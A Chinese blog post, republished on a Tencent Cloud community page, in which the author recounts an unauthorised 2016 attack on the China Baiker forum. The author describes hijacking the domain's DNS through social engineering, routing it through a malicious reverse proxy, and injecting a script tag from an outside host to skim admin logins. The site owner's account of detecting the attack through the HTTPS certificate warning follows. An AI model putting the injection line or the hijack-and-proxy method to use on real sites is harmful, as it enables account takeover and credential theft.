专栏首页中国白客联盟一次失败的针对白客联盟的渗透测试(域名劫持成功钓鱼失败)

一次失败的针对白客联盟的渗透测试(域名劫持成功钓鱼失败)

成功的渗透测试套路基本都是那一套。换汤不换药,不成功的原因却是千奇百怪。

我本人感觉,一次不成功的测试如果讲解细致的话反而更能提升技术水平。

这次就来讲一下针对白客联盟的渗透测试是因何失败的,具体操作方式,是通过社工手动劫持域名,然后结合反向代理添加恶意代码劫持白客联盟的登录表单(打个比方就是做一个恶意CDN)。

这次渗透是nosafe团队协同参与的,渗透前期信息踩点和域名权限获取是由P4ss完成,因为具体操作手法牵扯到域名商安全问题,以及大量站长个人信息。这里不方便做详细讲解.

但是本次渗透过程一大半的功劳都在于P4ss同志!他的努力让我获取到了域名权限。可以进行下一步的劫持操作

域名权限获取之后 渗透前期工作已经做完,由我接手操作。

可以看到 白客联盟是通过https访问的,并且仅限https访问,这是本次渗透测试失败的主要原因。

使用nosafe域名劫持半自动化钓鱼工具,可以直接一键搭建构造恶意反向代理。

这里我按照我们的系统提示进行了操作 将他的www域名cname解析至我们的fuck.hackgo.top。

我们这里看一下替换关键字符的方式

针对discuz(其实任何网站都可以这样)

我们设置目标关键字为

</body>替换后的字符为<script src=http://vxss.cc/wC0j9v></script></body>

这样做的目的是为了把我们的表单劫持js通过恶意反向代理插入到他的网页去

本来当我准备坐等管理员登录后台收密码的时候。。缺发现域名dns被改回去了

也就是说我丢失了域名权限..

..按照成功的套路来讲,站长根本发现不了网站有误差呀。。到底哪里出了问题呢

为了给大家最官方的答复。。在这里也感谢白客联盟站长jumbo后期给了我授权,并且他本人把当时他所遇到的情况总结了出来,好让大家总结失败原因。学习

----------------------以下为Jumbo站长的原文------------------------------------------

说说我咋发现我论坛被劫持的....

17号突然发现我论坛(https://www.chinabaiker.com)绿色证书变红色了,我擦,这一看就是被劫持或者mitm了啊,赶紧超级ping下我域名,我擦,ip变45上了,但是我没管,因为我论坛还能访问(实际上是我懒),又因为是我司网速问题。

17号晚回到家,发现我的https绿色证书还是红色,论坛链接全变我的服务器ip了,还是不管,我还是以为是我宿舍网速问题。。。

18号,发现还是红色,再次超级ping下,发现ip还是45,不是我的,然后我上服务器,把我服务器重启了下,发现我论坛无法访问了,说明是域名是在我这服务器上的啊。

但是我前几天看到@F4ther_法釜 基友劫持安全脉搏的文章,我觉得肯定有问题,上idc代理商,发现dns正常,就没管,到了下午,我就跑到真正的域名商那里登录下,发现dns被改成ffdns的了,我擦,这个dns不就是@F4ther_法釜 基友劫持安全脉搏用的dns,这里已经确定我https证书变红色,ip变了是被劫持了,不是我公司、宿舍网速问题了。。

而且我访问那个45ip,发现他的站跟我一样,一看就是把我站仿了过来,然后想跟安全脉搏一样,想劫持我后台密码。。

我这里做了个安全保护措施,就是我登录后台时直接用ip登录,或者是本地host绑定,这样对方如果在劫持的情况下也无法劫持到我的后台密码并为了以防万一我修改了后台密码。

然后我赶紧百度查了下,一开始看错了,以为是加速乐的,

登录我的账号,发现我的域名还在我的原先加速乐账号上,说明不是劫持到加速乐上了,而且我的域名chinabaiker.com还在我原先加速乐账号上,(这里要说下,比如某个账号把某个域名放到某个dns商自己名下了,就算dns没改成你现在的,你也没法解析,但是如果对方也是想用你现在的dns商,是没法添加他的域名的,因为他的域名被你添加到了你的账号,)于是又去百度搜了下,才发现是牛盾,

我就注册了个账号,由于验证邮件迟迟没收到,就跑去跟牛顿客服说,

牛盾客服竟然说没我的域名,难道劫持者把我dns改成牛盾dns后就没反应了?不可能啊,因为我ping我域名,发现是被劫持到别处了,不管,点击重新发送邮件,终于验证成功了,我就添加我的域名,提示已经被绑定过了!!

难道客服骗我,不行,继续找他

果然,就是跑牛盾这边来了,那我现在的目的就是搞到这个劫持者注册牛盾的账号信息,但是无论论我如何恐吓,甚至是报警都没法打动对方,

突然对方客服给我发了@F4ther 基友劫持安全脉搏的文章,我擦,这是咋回事,难道这个牛盾是@F4ther 基友开的?怪不得每次劫持都用牛盾,后来发现并不是。。

算了算了,累了,不查下去了,最后的决定就是把域名转到万网。

然后刚刚@F4ther 基友加我了,于是我说

他这么说让我很焦灼啊。。。

http://user.qzone.qq.com/775983572/blog/1471576966

---------Jumbo截止------------------------------------------------

本人做个总结:

对https的经验过少 以至于在构造反向代理时忽略了证书一致性问题 导致浏览器提示证书错误 https不安全, 被站长发现。通过host绑定后访问。

让域名劫持失效

最主要的原因在于https 其次就是Jumbo站长的警惕意识。

失败乃成功之母。在这里也感谢白客联盟Jumbo能对我未经授权就测试的行为表示理解支持!也祝白客联盟更好的发展

本文分享自微信公众号 - 中国白客联盟(China_Baiker)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2016-12-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 访问者模式 Visitor 行为型 设计模式(二十七)

    《侠客行》是当代作家金庸创作的长篇武侠小说,新版电视剧《侠客行》中,开篇有一段独白: 

    noteless
  • 谈谈身份与访问管理(IAM)的12大趋势

    你可能已经注意到,在刚结束不久的RSA大会上大量讨论围绕“身份”展开,而且很多公司也开始将自己的产品贴上“身份与访问管理(IAM)”的标签,大谈“身份治理”、“...

    FB客服
  • Linux实践(1) - sudo 权限规划

    为了保障企业信息安全,使用 sudo 授权形式管理用户,对安全权限进行合理规划,针对不同的使用人群进行分层设定相应的使用权限。

    懒人的小脑
  • 云+社区开发者大会TechWork技术工作坊学员准备——智能钛机器学习平台应用实践

    3. 需要提前申请开通TI-ONE平台(申请中备注“参加开发者大会工作坊”),并开通COS服务

    云加社区专栏
  • 关于conda 更新时权限的问题

    就被告知以下错误:PermissionError(13,'Permission denied)

    HUBU生信
  • centos7搭建sftpsftp先决条件设置sftp用户配置 sshd_config 测试连接

    章鱼喵
  • 小程序开店指南:如何让你的门店出现在“附近的小程序”页面?

    商户可在小程序后台添加地点,展示这个小程序。当用户在此地点的周围,可在微信小程序入口中“附近的小程序”发现并使用小程序提供的服务。

    用户1745481
  • 腾讯云访问管理服务(CAM)介绍

    访问管理(Cloud Access Management,CAM)是一套建立于腾讯云账号体系和开放云API基础之上的云服务,用于帮助客户安全地管理腾讯云账户的访...

    byronzhong
  • 腾讯云中宝塔面板升级专业版

    霹格软件
  • 30秒找到藏在家里的手机

    如果你有两个手机而且你的手机没有静音,那可以用另一个手机给不见的手机打一个电话。可是如果你的手机静音了呢?有人说可以等到晚上打电话,看家里哪里在发光。那么如果你...

    青南

扫码关注云+社区

领取腾讯云代金券